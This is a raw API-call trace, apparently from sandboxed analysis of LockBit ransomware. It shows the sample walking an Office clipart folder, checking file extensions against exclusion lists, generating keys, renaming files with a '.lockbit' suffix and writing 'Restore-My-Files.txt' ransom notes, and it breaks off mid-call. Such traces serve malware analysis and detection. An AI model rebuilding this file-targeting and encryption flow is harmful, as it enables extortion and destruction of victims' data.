1 [0165.429] lstrcmpiW (lpString1=".sqlite3", lpString2=".MID") returned 1 [0165.430] lstrcmpiW (lpString1=".sqlitedb", lpString2=".MID") returned 1 [0165.430] lstrcmpiW (lpString1=".tmd", lpString2=".MID") returned 1 [0165.430] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_02.MID.lockbit") returned 72 [0165.430] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_02.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_02.mid"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0165.431] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0165.431] malloc (_Size=0x40068) returned 0x3df0008 [0165.431] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=5714) returned 1 [0165.431] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.432] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.432] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0165.432] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.432] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.432] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0165.432] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0165.438] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_02.MID.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_02.MID.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0165.438] malloc (_Size=0xa6) returned 0x1fa2ed8 [0165.438] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0165.439] free (_Block=0x1fa2ed8) [0165.439] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_02.MID" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0165.439] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0165.439] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0165.439] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x6cd64f50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x215a, dwReserved0=0x0, dwReserved1=0x0, cFileName="PARNT_03.MID", cAlternateFileName="")) returned 1 [0165.439] lstrcmpiW (lpString1=".", lpString2="PARNT_03.MID") returned -1 [0165.439] lstrcmpiW (lpString1="..", lpString2="PARNT_03.MID") returned -1 [0165.439] PathFindExtensionW (pszPath="PARNT_03.MID") returned=".MID" [0165.439] lstrcmpiW (lpString1=".386", lpString2=".MID") returned -1 [0165.439] lstrcmpiW (lpString1=".cmd", lpString2=".MID") returned -1 [0165.439] lstrcmpiW (lpString1=".exe", lpString2=".MID") returned -1 [0165.440] lstrcmpiW (lpString1=".ani", lpString2=".MID") returned -1 [0165.440] lstrcmpiW (lpString1=".adv", lpString2=".MID") returned -1 [0165.440] lstrcmpiW (lpString1=".theme", lpString2=".MID") returned 1 [0165.440] lstrcmpiW (lpString1=".msi", lpString2=".MID") returned 1 [0165.440] lstrcmpiW (lpString1=".msp", lpString2=".MID") returned 1 [0165.440] lstrcmpiW (lpString1=".com", lpString2=".MID") returned -1 [0165.440] lstrcmpiW (lpString1=".diagpkg", lpString2=".MID") returned -1 [0165.440] lstrcmpiW (lpString1=".nls", lpString2=".MID") returned 1 [0165.440] lstrcmpiW (lpString1=".diagcab", lpString2=".MID") returned -1 [0165.440] lstrcmpiW (lpString1=".lock", lpString2=".MID") returned -1 [0165.440] lstrcmpiW (lpString1=".ocx", lpString2=".MID") returned 1 [0165.440] lstrcmpiW (lpString1=".mpa", lpString2=".MID") returned 1 [0165.440] lstrcmpiW (lpString1=".cpl", lpString2=".MID") returned -1 [0165.440] lstrcmpiW (lpString1=".mod", lpString2=".MID") returned 1 [0165.440] lstrcmpiW (lpString1=".hta", lpString2=".MID") returned -1 [0165.440] lstrcmpiW (lpString1=".icns", lpString2=".MID") returned -1 [0165.440] lstrcmpiW (lpString1=".prf", lpString2=".MID") returned 1 [0165.440] lstrcmpiW (lpString1=".rtp", lpString2=".MID") returned 1 [0165.440] lstrcmpiW (lpString1=".diagcfg", lpString2=".MID") returned -1 [0165.440] lstrcmpiW (lpString1=".msstyles", lpString2=".MID") returned 1 [0165.440] lstrcmpiW (lpString1=".bin", lpString2=".MID") returned -1 [0165.440] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0165.440] lstrcmpiW (lpString1=".shs", lpString2=".MID") returned 1 [0165.440] lstrcmpiW (lpString1=".drv", lpString2=".MID") returned -1 [0165.440] lstrcmpiW (lpString1=".wpx", lpString2=".MID") returned 1 [0165.440] lstrcmpiW (lpString1=".bat", lpString2=".MID") returned -1 [0165.441] lstrcmpiW (lpString1=".rom", lpString2=".MID") returned 1 [0165.441] lstrcmpiW (lpString1=".msc", lpString2=".MID") returned 1 [0165.441] lstrcmpiW (lpString1=".spl", lpString2=".MID") returned 1 [0165.441] lstrcmpiW (lpString1=".ps1", lpString2=".MID") returned 1 [0165.441] lstrcmpiW (lpString1=".msu", lpString2=".MID") returned 1 [0165.441] lstrcmpiW (lpString1=".ics", lpString2=".MID") returned -1 [0165.441] lstrcmpiW (lpString1=".key", lpString2=".MID") returned -1 [0165.441] lstrcmpiW (lpString1=".mp3", lpString2=".MID") returned 1 [0165.441] lstrcmpiW (lpString1=".reg", lpString2=".MID") returned 1 [0165.441] lstrcmpiW (lpString1=".dll", lpString2=".MID") returned -1 [0165.441] lstrcmpiW (lpString1=".ini", lpString2=".MID") returned -1 [0165.441] lstrcmpiW (lpString1=".idx", lpString2=".MID") returned -1 [0165.441] lstrcmpiW (lpString1=".sys", lpString2=".MID") returned 1 [0165.441] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0165.441] lstrcmpiW (lpString1=".ico", lpString2=".MID") returned -1 [0165.441] lstrcmpiW (lpString1=".lnk", lpString2=".MID") returned -1 [0165.441] lstrcmpiW (lpString1=".rdp", lpString2=".MID") returned 1 [0165.441] lstrcmpiW (lpString1=".lockbit", lpString2=".MID") returned -1 [0165.441] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PARNT_03.MID") returned 1 [0165.441] lstrcmpiW (lpString1="ntldr", lpString2="PARNT_03.MID") returned -1 [0165.441] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PARNT_03.MID") returned -1 [0165.441] lstrcmpiW (lpString1="bootsect.bak", lpString2="PARNT_03.MID") returned -1 [0165.441] lstrcmpiW (lpString1="autorun.inf", lpString2="PARNT_03.MID") returned -1 [0165.441] lstrcmpiW (lpString1="thumbs.db", lpString2="PARNT_03.MID") returned 1 [0165.441] lstrcmpiW (lpString1="iconcache.db", lpString2="PARNT_03.MID") returned -1 [0165.442] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0165.442] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_03.MID") returned=".MID" [0165.442] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0165.442] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0165.442] lstrcmpiW (lpString1=".7z", lpString2=".MID") returned -1 [0165.442] lstrcmpiW (lpString1=".ckp", lpString2=".MID") returned -1 [0165.442] lstrcmpiW (lpString1=".dacpac", lpString2=".MID") returned -1 [0165.442] lstrcmpiW (lpString1=".db", lpString2=".MID") returned -1 [0165.442] lstrcmpiW (lpString1=".db-shm", lpString2=".MID") returned -1 [0165.442] lstrcmpiW (lpString1=".db-wal", lpString2=".MID") returned -1 [0165.442] lstrcmpiW (lpString1=".db3", lpString2=".MID") returned -1 [0165.442] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0165.442] lstrcmpiW (lpString1=".dbc", lpString2=".MID") returned -1 [0165.442] lstrcmpiW (lpString1=".dbs", lpString2=".MID") returned -1 [0165.442] lstrcmpiW (lpString1=".dbt", lpString2=".MID") returned -1 [0165.442] lstrcmpiW (lpString1=".dbv", lpString2=".MID") returned -1 [0165.442] lstrcmpiW (lpString1=".frm", lpString2=".MID") returned -1 [0165.442] lstrcmpiW (lpString1=".mdf", lpString2=".MID") returned -1 [0165.442] lstrcmpiW (lpString1=".mrg", lpString2=".MID") returned 1 [0165.442] lstrcmpiW (lpString1=".mwb", lpString2=".MID") returned 1 [0165.442] lstrcmpiW (lpString1=".myd", lpString2=".MID") returned 1 [0165.442] lstrcmpiW (lpString1=".ndf", lpString2=".MID") returned 1 [0165.442] lstrcmpiW (lpString1=".qry", lpString2=".MID") returned 1 [0165.442] lstrcmpiW (lpString1=".sdb", lpString2=".MID") returned 1 [0165.442] lstrcmpiW (lpString1=".sdf", lpString2=".MID") returned 1 [0165.443] lstrcmpiW (lpString1=".sql", lpString2=".MID") returned 1 [0165.443] lstrcmpiW (lpString1=".sqlite", lpString2=".MID") returned 1 [0165.443] lstrcmpiW (lpString1=".sqlite3", lpString2=".MID") returned 1 [0165.443] lstrcmpiW (lpString1=".sqlitedb", lpString2=".MID") returned 1 [0165.443] lstrcmpiW (lpString1=".tmd", lpString2=".MID") returned 1 [0165.443] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_03.MID.lockbit") returned 72 [0165.443] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_03.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_03.mid"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0165.444] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0165.444] malloc (_Size=0x40068) returned 0x3df0008 [0165.444] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=8538) returned 1 [0165.444] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.445] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.445] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0165.445] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.445] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.445] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0165.446] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0165.450] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_03.MID.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_03.MID.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0165.451] malloc (_Size=0xa6) returned 0x1fa2ed8 [0165.451] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0165.453] free (_Block=0x1fa2ed8) [0165.453] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_03.MID" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0165.453] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0165.453] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0165.453] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x6cd64f50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x17b6, dwReserved0=0x0, dwReserved1=0x0, cFileName="PARNT_04.MID", cAlternateFileName="")) returned 1 [0165.453] lstrcmpiW (lpString1=".", lpString2="PARNT_04.MID") returned -1 [0165.453] lstrcmpiW (lpString1="..", lpString2="PARNT_04.MID") returned -1 [0165.453] PathFindExtensionW (pszPath="PARNT_04.MID") returned=".MID" [0165.453] lstrcmpiW (lpString1=".386", lpString2=".MID") returned -1 [0165.453] lstrcmpiW (lpString1=".cmd", lpString2=".MID") returned -1 [0165.453] lstrcmpiW (lpString1=".exe", lpString2=".MID") returned -1 [0165.453] lstrcmpiW (lpString1=".ani", lpString2=".MID") returned -1 [0165.453] lstrcmpiW (lpString1=".adv", lpString2=".MID") returned -1 [0165.453] lstrcmpiW (lpString1=".theme", lpString2=".MID") returned 1 [0165.453] lstrcmpiW (lpString1=".msi", lpString2=".MID") returned 1 [0165.453] lstrcmpiW (lpString1=".msp", lpString2=".MID") returned 1 [0165.453] lstrcmpiW (lpString1=".com", lpString2=".MID") returned -1 [0165.453] lstrcmpiW (lpString1=".diagpkg", lpString2=".MID") returned -1 [0165.453] lstrcmpiW (lpString1=".nls", lpString2=".MID") returned 1 [0165.453] lstrcmpiW (lpString1=".diagcab", lpString2=".MID") returned -1 [0165.453] lstrcmpiW (lpString1=".lock", lpString2=".MID") returned -1 [0165.454] lstrcmpiW (lpString1=".ocx", lpString2=".MID") returned 1 [0165.454] lstrcmpiW (lpString1=".mpa", lpString2=".MID") returned 1 [0165.454] lstrcmpiW (lpString1=".cpl", lpString2=".MID") returned -1 [0165.454] lstrcmpiW (lpString1=".mod", lpString2=".MID") returned 1 [0165.454] lstrcmpiW (lpString1=".hta", lpString2=".MID") returned -1 [0165.454] lstrcmpiW (lpString1=".icns", lpString2=".MID") returned -1 [0165.454] lstrcmpiW (lpString1=".prf", lpString2=".MID") returned 1 [0165.454] lstrcmpiW (lpString1=".rtp", lpString2=".MID") returned 1 [0165.454] lstrcmpiW (lpString1=".diagcfg", lpString2=".MID") returned -1 [0165.454] lstrcmpiW (lpString1=".msstyles", lpString2=".MID") returned 1 [0165.454] lstrcmpiW (lpString1=".bin", lpString2=".MID") returned -1 [0165.454] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0165.454] lstrcmpiW (lpString1=".shs", lpString2=".MID") returned 1 [0165.454] lstrcmpiW (lpString1=".drv", lpString2=".MID") returned -1 [0165.454] lstrcmpiW (lpString1=".wpx", lpString2=".MID") returned 1 [0165.454] lstrcmpiW (lpString1=".bat", lpString2=".MID") returned -1 [0165.454] lstrcmpiW (lpString1=".rom", lpString2=".MID") returned 1 [0165.454] lstrcmpiW (lpString1=".msc", lpString2=".MID") returned 1 [0165.454] lstrcmpiW (lpString1=".spl", lpString2=".MID") returned 1 [0165.454] lstrcmpiW (lpString1=".ps1", lpString2=".MID") returned 1 [0165.454] lstrcmpiW (lpString1=".msu", lpString2=".MID") returned 1 [0165.454] lstrcmpiW (lpString1=".ics", lpString2=".MID") returned -1 [0165.455] lstrcmpiW (lpString1=".key", lpString2=".MID") returned -1 [0165.455] lstrcmpiW (lpString1=".mp3", lpString2=".MID") returned 1 [0165.455] lstrcmpiW (lpString1=".reg", lpString2=".MID") returned 1 [0165.455] lstrcmpiW (lpString1=".dll", lpString2=".MID") returned -1 [0165.455] lstrcmpiW (lpString1=".ini", lpString2=".MID") returned -1 [0165.455] lstrcmpiW (lpString1=".idx", lpString2=".MID") returned -1 [0165.455] lstrcmpiW (lpString1=".sys", lpString2=".MID") returned 1 [0165.455] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0165.455] lstrcmpiW (lpString1=".ico", lpString2=".MID") returned -1 [0165.455] lstrcmpiW (lpString1=".lnk", lpString2=".MID") returned -1 [0165.455] lstrcmpiW (lpString1=".rdp", lpString2=".MID") returned 1 [0165.455] lstrcmpiW (lpString1=".lockbit", lpString2=".MID") returned -1 [0165.455] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PARNT_04.MID") returned 1 [0165.455] lstrcmpiW (lpString1="ntldr", lpString2="PARNT_04.MID") returned -1 [0165.455] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PARNT_04.MID") returned -1 [0165.455] lstrcmpiW (lpString1="bootsect.bak", lpString2="PARNT_04.MID") returned -1 [0165.455] lstrcmpiW (lpString1="autorun.inf", lpString2="PARNT_04.MID") returned -1 [0165.455] lstrcmpiW (lpString1="thumbs.db", lpString2="PARNT_04.MID") returned 1 [0165.455] lstrcmpiW (lpString1="iconcache.db", lpString2="PARNT_04.MID") returned -1 [0165.455] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0165.455] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_04.MID") returned=".MID" [0165.455] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0165.455] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0165.455] lstrcmpiW (lpString1=".7z", lpString2=".MID") returned -1 [0165.456] lstrcmpiW (lpString1=".ckp", lpString2=".MID") returned -1 [0165.456] lstrcmpiW (lpString1=".dacpac", lpString2=".MID") returned -1 [0165.456] lstrcmpiW (lpString1=".db", lpString2=".MID") returned -1 [0165.456] lstrcmpiW (lpString1=".db-shm", lpString2=".MID") returned -1 [0165.456] lstrcmpiW (lpString1=".db-wal", lpString2=".MID") returned -1 [0165.456] lstrcmpiW (lpString1=".db3", lpString2=".MID") returned -1 [0165.456] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0165.456] lstrcmpiW (lpString1=".dbc", lpString2=".MID") returned -1 [0165.456] lstrcmpiW (lpString1=".dbs", lpString2=".MID") returned -1 [0165.456] lstrcmpiW (lpString1=".dbt", lpString2=".MID") returned -1 [0165.456] lstrcmpiW (lpString1=".dbv", lpString2=".MID") returned -1 [0165.456] lstrcmpiW (lpString1=".frm", lpString2=".MID") returned -1 [0165.456] lstrcmpiW (lpString1=".mdf", lpString2=".MID") returned -1 [0165.456] lstrcmpiW (lpString1=".mrg", lpString2=".MID") returned 1 [0165.456] lstrcmpiW (lpString1=".mwb", lpString2=".MID") returned 1 [0165.456] lstrcmpiW (lpString1=".myd", lpString2=".MID") returned 1 [0165.456] lstrcmpiW (lpString1=".ndf", lpString2=".MID") returned 1 [0165.456] lstrcmpiW (lpString1=".qry", lpString2=".MID") returned 1 [0165.456] lstrcmpiW (lpString1=".sdb", lpString2=".MID") returned 1 [0165.456] lstrcmpiW (lpString1=".sdf", lpString2=".MID") returned 1 [0165.456] lstrcmpiW (lpString1=".sql", lpString2=".MID") returned 1 [0165.456] lstrcmpiW (lpString1=".sqlite", lpString2=".MID") returned 1 [0165.456] lstrcmpiW (lpString1=".sqlite3", lpString2=".MID") returned 1 [0165.456] lstrcmpiW (lpString1=".sqlitedb", lpString2=".MID") returned 1 [0165.456] lstrcmpiW (lpString1=".tmd", lpString2=".MID") returned 1 [0165.457] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_04.MID.lockbit") returned 72 [0165.457] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_04.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\parnt_04.mid"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0165.461] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0165.461] malloc (_Size=0x40068) returned 0x3df0008 [0165.461] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=6070) returned 1 [0165.461] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.462] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.462] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0165.462] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.462] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.463] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0165.463] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0165.468] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_04.MID.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_04.MID.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0165.468] malloc (_Size=0xa6) returned 0x1fa2ed8 [0165.469] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0165.469] free (_Block=0x1fa2ed8) [0165.469] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PARNT_04.MID" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0165.469] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0165.469] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0165.469] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x59c68c90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x1784, dwReserved0=0x0, dwReserved1=0x0, cFileName="PARNT_05.MID", cAlternateFileName="")) returned 1 [0165.469] lstrcmpiW (lpString1=".", lpString2="PARNT_05.MID") returned -1 [0165.469] lstrcmpiW (lpString1="..", lpString2="PARNT_05.MID") returned -1 [0165.469] PathFindExtensionW (pszPath="PARNT_05.MID") returned=".MID" [0165.470] lstrcmpiW (lpString1=".386", lpString2=".MID") returned -1 [0165.470] lstrcmpiW (lpString1=".cmd", lpString2=".MID") returned -1 [0165.470] lstrcmpiW (lpString1=".exe", lpString2=".MID") returned -1 [0165.470] lstrcmpiW (lpString1=".ani", lpString2=".MID") returned -1 [0165.470] lstrcmpiW (lpString1=".adv", lpString2=".MID") returned -1 [0165.470] lstrcmpiW (lpString1=".theme", lpString2=".MID") returned 1 [0165.470] lstrcmpiW (lpString1=".msi", lpString2=".MID") returned 1 [0165.470] lstrcmpiW (lpString1=".msp", lpString2=".MID") returned 1 [0165.470] lstrcmpiW (lpString1=".com", lpString2=".MID") returned -1 [0165.470] lstrcmpiW (lpString1=".diagpkg", lpString2=".MID") returned -1 [0165.470] lstrcmpiW (lpString1=".nls", lpString2=".MID") returned 1 [0165.470] lstrcmpiW (lpString1=".diagcab", lpString2=".MID") returned -1 [0165.470] lstrcmpiW (lpString1=".lock", lpString2=".MID") returned -1 [0165.470] lstrcmpiW (lpString1=".ocx", lpString2=".MID") returned 1 [0165.470] lstrcmpiW (lpString1=".mpa", lpString2=".MID") returned 1 [0165.470] lstrcmpiW (lpString1=".cpl", lpString2=".MID") returned -1 [0165.470] lstrcmpiW (lpString1=".mod", lpString2=".MID") returned 1 [0165.470] lstrcmpiW (lpString1=".hta", lpString2=".MID") returned -1 [0165.470] lstrcmpiW (lpString1=".icns", lpString2=".MID") returned -1 [0165.470] lstrcmpiW (lpString1=".prf", lpString2=".MID") returned 1 [0165.470] lstrcmpiW (lpString1=".rtp", lpString2=".MID") returned 1 [0165.470] lstrcmpiW (lpString1=".diagcfg", lpString2=".MID") returned -1 [0165.470] lstrcmpiW (lpString1=".msstyles", lpString2=".MID") returned 1 [0165.470] lstrcmpiW (lpString1=".bin", lpString2=".MID") returned -1 [0165.471] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0165.471] lstrcmpiW (lpString1=".shs", lpString2=".MID") returned 1 [0165.471] lstrcmpiW (lpString1=".drv", lpString2=".MID") returned -1 [0165.471] lstrcmpiW (lpString1=".wpx", lpString2=".MID") returned 1 [0165.471] lstrcmpiW (lpString1=".bat", lpString2=".MID") returned -1 [0165.471] lstrcmpiW (lpString1=".rom", lpString2=".MID") returned 1 [0165.471] lstrcmpiW (lpString1=".msc", lpString2=".MID") returned 1 [0165.471] lstrcmpiW (lpString1=".spl", lpString2=".MID") returned 1 [0165.471] lstrcmpiW (lpString1=".ps1", lpString2=".MID") returned 1 [0165.471] lstrcmpiW (lpString1=".msu", lpString2=".MID") returned 1 [0165.471] 